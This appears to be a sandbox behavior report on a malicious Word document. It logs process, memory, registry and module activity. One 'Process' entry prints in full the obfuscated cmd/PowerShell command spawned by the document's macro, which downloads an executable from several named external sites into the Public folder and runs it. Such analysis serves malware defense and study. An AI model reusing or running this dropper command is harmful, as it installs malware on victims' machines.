Malicious Microsoft Word Document (Analysis Date 2017-11-28) | Grouped Behavior
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 159, Network: 0)
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:08, Reason: Analysis Target
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:15
OS Process Information
Information Value
PID 0x9d4
Parent PID 0x584 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xA58, 0xA54, 0xA50, 0xA48, 0xA38, 0xA34, 0xA10, 0x9EC, 0x9E8, 0x9E0, 0x9DC, 0x9D8, 0xA74, 0xA78, 0xA7C, 0xA80, 0xA84, 0xA88, 0xAAC, 0xACC, 0xAD8, 0x8A0, 0x8B0, 0x8F4, 0x910
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable False False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable False False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable False False False
private_0x00000000000f0000 0x000f0000 0x001effff Private Memory Readable, Writable False False False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000200000 0x00200000 0x00206fff Pagefile Backed Memory Readable False False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable False False False
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000420000 0x00420000 0x00420fff Private Memory Readable, Writable False False False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable False False False
pagefile_0x0000000000440000 0x00440000 0x00441fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000450000 0x00450000 0x00451fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000460000 0x00460000 0x00462fff Pagefile Backed Memory Readable False False False
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000610000 0x00610000 0x00790fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000007a0000 0x007a0000 0x01b9ffff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01ba0000 0x01e6efff Memory Mapped File Readable False False False
pagefile_0x0000000001e70000 0x01e70000 0x02262fff Pagefile Backed Memory Readable False False False
private_0x0000000002270000 0x02270000 0x0236ffff Private Memory Readable, Writable False False False
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory - False False False
pagefile_0x0000000002380000 0x02380000 0x02382fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002390000 0x02390000 0x02392fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023a0000 0x023a0000 0x023a2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023b0000 0x023b0000 0x023b2fff Pagefile Backed Memory Readable False False False
private_0x00000000023c0000 0x023c0000 0x023fffff Private Memory Readable, Writable False False False
private_0x0000000002410000 0x02410000 0x0241ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002420000 0x02420000 0x02421fff Pagefile Backed Memory Readable False False False
private_0x0000000002470000 0x02470000 0x024effff Private Memory Readable, Writable False False False
pagefile_0x00000000024f0000 0x024f0000 0x025cefff Pagefile Backed Memory Readable False False False
kernelbase.dll.mui 0x025d0000 0x0268ffff Memory Mapped File Readable, Writable False False False
private_0x0000000002690000 0x02690000 0x0278ffff Private Memory Readable, Writable False False False
private_0x00000000027a0000 0x027a0000 0x027aefff Private Memory Readable, Writable True True False
private_0x00000000027f0000 0x027f0000 0x027f2fff Private Memory Readable, Writable True True False
private_0x0000000002830000 0x02830000 0x02830fff Private Memory Readable, Writable False False False
pagefile_0x0000000002840000 0x02840000 0x02844fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002850000 0x02850000 0x02850fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002860000 0x02860000 0x02860fff Pagefile Backed Memory Readable False False False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable False False False
pagefile_0x0000000002880000 0x02880000 0x02881fff Pagefile Backed Memory Readable False False False
msxml6r.dll 0x02890000 0x02890fff Memory Mapped File Readable False False False
private_0x00000000028a0000 0x028a0000 0x028affff Private Memory Readable, Writable False False False
cfgmgr32.dll 0x028b0000 0x028e5fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000028f0000 0x028f0000 0x029effff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x029f0000 0x02a14fff Memory Mapped File Readable False False False
private_0x0000000002a20000 0x02a20000 0x02b1ffff Private Memory Readable, Writable False False False
private_0x0000000002b20000 0x02b20000 0x02d1ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002d20000 0x02d20000 0x02d20fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002d30000 0x02d30000 0x02d31fff Pagefile Backed Memory Readable False False False
private_0x0000000002d40000 0x02d40000 0x02d40fff Private Memory Readable, Writable False False False
c_1255.nls 0x02d50000 0x02d60fff Memory Mapped File Readable False False False
private_0x0000000002d70000 0x02d70000 0x02deffff Private Memory Readable, Writable False False False
private_0x0000000002df0000 0x02df0000 0x02e0ffff Private Memory - False False False
onbttnwd.dll 0x02e10000 0x02e14fff Memory Mapped File Readable False False False
private_0x0000000002e20000 0x02e20000 0x02e3efff Private Memory Readable, Writable False False False
private_0x0000000002e40000 0x02e40000 0x02e5ffff Private Memory - False False False
private_0x0000000002e60000 0x02e60000 0x02f5ffff Private Memory Readable, Writable False False False
private_0x0000000002f60000 0x02f60000 0x02f7ffff Private Memory - False False False
private_0x0000000002f80000 0x02f80000 0x02f9ffff Private Memory - False False False
stdole2.tlb 0x02fa0000 0x02fa3fff Memory Mapped File Readable False False False
private_0x0000000002fc0000 0x02fc0000 0x030bffff Private Memory Readable, Writable False False False
private_0x00000000030c0000 0x030c0000 0x030defff Private Memory Readable, Writable True True False
private_0x00000000030e0000 0x030e0000 0x031dffff Private Memory Readable, Writable False False False
segoeui.ttf 0x031e0000 0x0325efff Memory Mapped File Readable False False False
private_0x0000000003270000 0x03270000 0x0327ffff Private Memory Readable, Writable False False False
private_0x00000000032a0000 0x032a0000 0x0339ffff Private Memory Readable, Writable False False False
pagefile_0x00000000033a0000 0x033a0000 0x0379ffff Pagefile Backed Memory Readable False False False
staticcache.dat 0x037a0000 0x040cffff Memory Mapped File Readable False False False
private_0x0000000004100000 0x04100000 0x0411dfff Private Memory Readable, Writable True True False
private_0x0000000004120000 0x04120000 0x0413efff Private Memory Readable, Writable True True False
private_0x0000000004150000 0x04150000 0x0416efff Private Memory Readable, Writable True True False
private_0x0000000004180000 0x04180000 0x0419efff Private Memory Readable, Writable True True False
private_0x00000000041a0000 0x041a0000 0x0429ffff Private Memory Readable, Writable False False False
private_0x0000000004350000 0x04350000 0x0436efff Private Memory Readable, Writable True True False
private_0x0000000004370000 0x04370000 0x0437ffff Private Memory Readable, Writable False False False
private_0x0000000004380000 0x04380000 0x0447ffff Private Memory Readable, Writable False False False
private_0x0000000004480000 0x04480000 0x0457ffff Private Memory Readable, Writable False False False
private_0x0000000004580000 0x04580000 0x0459efff Private Memory Readable, Writable True True False
private_0x00000000045a0000 0x045a0000 0x045affff Private Memory Readable, Writable False False False
private_0x0000000004660000 0x04660000 0x046dffff Private Memory Readable, Writable, Executable False False False
pagefile_0x00000000046e0000 0x046e0000 0x04edffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000004ee0000 0x04ee0000 0x04f00fff Private Memory Readable, Writable True True False
private_0x0000000004f10000 0x04f10000 0x04f2efff Private Memory Readable, Writable True True False
private_0x0000000004f40000 0x04f40000 0x04fbffff Private Memory Readable, Writable False False False
private_0x0000000004fc0000 0x04fc0000 0x04fddfff Private Memory Readable, Writable True True False
private_0x0000000004ff0000 0x04ff0000 0x050effff Private Memory Readable, Writable False False False
private_0x0000000005110000 0x05110000 0x0512efff Private Memory Readable, Writable True True False
private_0x00000000051c0000 0x051c0000 0x052bffff Private Memory Readable, Writable False False False
private_0x00000000052c0000 0x052c0000 0x056bffff Private Memory Readable, Writable False False False
private_0x00000000056e0000 0x056e0000 0x057dffff Private Memory Readable, Writable False False False
pagefile_0x00000000057e0000 0x057e0000 0x067dffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006990000 0x06990000 0x06a0ffff Private Memory Readable, Writable False False False
private_0x0000000006a10000 0x06a10000 0x06b0ffff Private Memory Readable, Writable False False False
private_0x0000000006b70000 0x06b70000 0x06beffff Private Memory Readable, Writable False False False
private_0x0000000006bf0000 0x06bf0000 0x06feffff Private Memory Readable, Writable False False False
private_0x0000000007000000 0x07000000 0x070fffff Private Memory Readable, Writable False False False
private_0x0000000007270000 0x07270000 0x072effff Private Memory Readable, Writable False False False
private_0x00000000072f0000 0x072f0000 0x07aeffff Private Memory Readable, Writable False False False
private_0x0000000007af0000 0x07af0000 0x07ef0fff Private Memory Readable, Writable False False False
private_0x0000000007f00000 0x07f00000 0x08300fff Private Memory Readable, Writable False False False
private_0x0000000008310000 0x08310000 0x08710fff Private Memory Readable, Writable False False False
private_0x0000000008720000 0x08720000 0x0891ffff Private Memory Readable, Writable False False False
private_0x0000000008920000 0x08920000 0x08ddffff Private Memory Readable, Writable False False False
private_0x0000000008de0000 0x08de0000 0x091dffff Private Memory Readable, Writable False False False
private_0x000000000a4b0000 0x0a4b0000 0x0a961fff Private Memory Readable, Writable True True False
private_0x0000000036e80000 0x36e80000 0x36e8ffff Private Memory Readable, Writable, Executable False False False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x74490000 0x744c2fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77260000 0x77266fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False
winword.exe 0x13ffb0000 0x14018afff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007febe960000 0x7febe960000 0x7febe96ffff Private Memory Readable, Writable, Executable False False False
onbttnwd.dll 0x7fee3a20000 0x7fee3a59fff Memory Mapped File Readable, Writable, Executable False False False
chart.dll 0x7fee3a60000 0x7fee4558fff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x7fee4560000 0x7fee4782fff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x7fee48c0000 0x7fee4958fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x7fee49d0000 0x7fee4b4dfff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x7fee4b50000 0x7fee4d1ffff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x7fee4d20000 0x7fee4e8ffff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x7fee4e90000 0x7fee500afff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x7fee5010000 0x7fee50cbfff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x7fee50d0000 0x7fee9f0efff Memory Mapped File Readable, Writable, Executable False False False
mso99lres.dll 0x7fee9f10000 0x7feea830fff Memory Mapped File Readable, Writable, Executable False False False
mso40uires.dll 0x7feea840000 0x7feeab47fff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x7feeab50000 0x7feebe2bfff Memory Mapped File Readable, Writable, Executable False False False
mso99lwin32client.dll 0x7feebe30000 0x7feec5fbfff Memory Mapped File Readable, Writable, Executable False False False
mso40uiwin32client.dll 0x7feec600000 0x7feeceeafff Memory Mapped File Readable, Writable, Executable False False False
mso30win32client.dll 0x7feecef0000 0x7feed367fff Memory Mapped File Readable, Writable, Executable False False False
mso20win32client.dll 0x7feed370000 0x7feed673fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x7feed680000 0x7feee7ebfff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x7feee7f0000 0x7feee8b5fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x7feee8c0000 0x7fef0c5efff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x7fef1100000 0x7fef116efff Memory Mapped File Readable, Writable, Executable False False False
sppc.dll 0x7fef1170000 0x7fef1196fff Memory Mapped File Readable, Writable, Executable False False False
mlang.dll 0x7fef11a0000 0x7fef11dafff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3780000 0x7fef378bfff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l1-2-0.dll 0x7fef3bb0000 0x7fef3bb2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-processthreads-l1-1-1.dll 0x7fef3bc0000 0x7fef3bc2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef3d90000 0x7fef3d92fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-localization-l1-2-0.dll 0x7fef3da0000 0x7fef3da2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l2-1-0.dll 0x7fef3db0000 0x7fef3db2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-timezone-l1-1-0.dll 0x7fef3dc0000 0x7fef3dc2fff Memory Mapped File Readable, Writable, Executable False False False
ucrtbase.dll 0x7fef3dd0000 0x7fef3ec1fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x7fef3ed0000 0x7fef3ed6fff Memory Mapped File Readable, Writable, Executable False False False
c2r64.dll 0x7fef3ee0000 0x7fef4008fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef4010000 0x7fef4089fff Memory Mapped File Readable, Writable, Executable False False False
appvisvsubsystems64.dll 0x7fef4090000 0x7fef42c5fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x7fef4a60000 0x7fef4c51fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x7fef4cf0000 0x7fef4d60fff Memory Mapped File Readable, Writable, Executable False False False
msointl30.dll 0x7fef5270000 0x7fef527efff Memory Mapped File Readable, Writable, Executable False False False
wbemsvc.dll 0x7fef5740000 0x7fef5753fff Memory Mapped File Readable, Writable, Executable False False False
wbemprox.dll 0x7fef5a40000 0x7fef5a4efff Memory Mapped File Readable, Writable, Executable False False False
ntdsapi.dll 0x7fef5a50000 0x7fef5a76fff Memory Mapped File Readable, Writable, Executable False False False
For performance reasons, the remaining 561 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Registry (44)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Open Key win64 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 - True 1
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 78, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 2
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 1
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Process (1)
Operation Process Additional Information Success Count
Create CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host 
uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) os_pid = 0xad0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Module (83)
Operation Module Additional Information Success Count Logfile
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee3590000 True 1
Fn
Get Handle Unknown module name base_address = 0x7fef8cd0000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\user32.dll base_address = 0x76e70000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7feff1c0000 True 1
Fn
Get Handle ole32.dll base_address = 0x7fefe810000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 2
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7fef8d51618 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7fef8d4f088 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetSystemMetrics, address_out = 0x76e894f0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromWindow, address_out = 0x76e85f08 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromRect, address_out = 0x76e82b00 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromPoint, address_out = 0x76e7ab64 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayMonitors, address_out = 0x76e85c30 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMonitorInfoA, address_out = 0x76e7a730 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayDevicesA, address_out = 0x76e7a5b4 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7feff1c2270 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7feff1ca550 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7feff2520d0 True 1
Fn
Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7feff24dbd0 True 1
Fn
Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7feff1c5c90 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7feff1c6330 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7feff1e66c0 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7feff1c4710 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7feff1c48f0 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7feff1fb640 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7feff1fb360 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7feff202640 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7feff1e58a0 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7feff1e5820 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7feff1faf20 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7feff252160 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0 True 1
Fn
Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7feff1e5a60 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7feff1e5a30 True 1
Fn
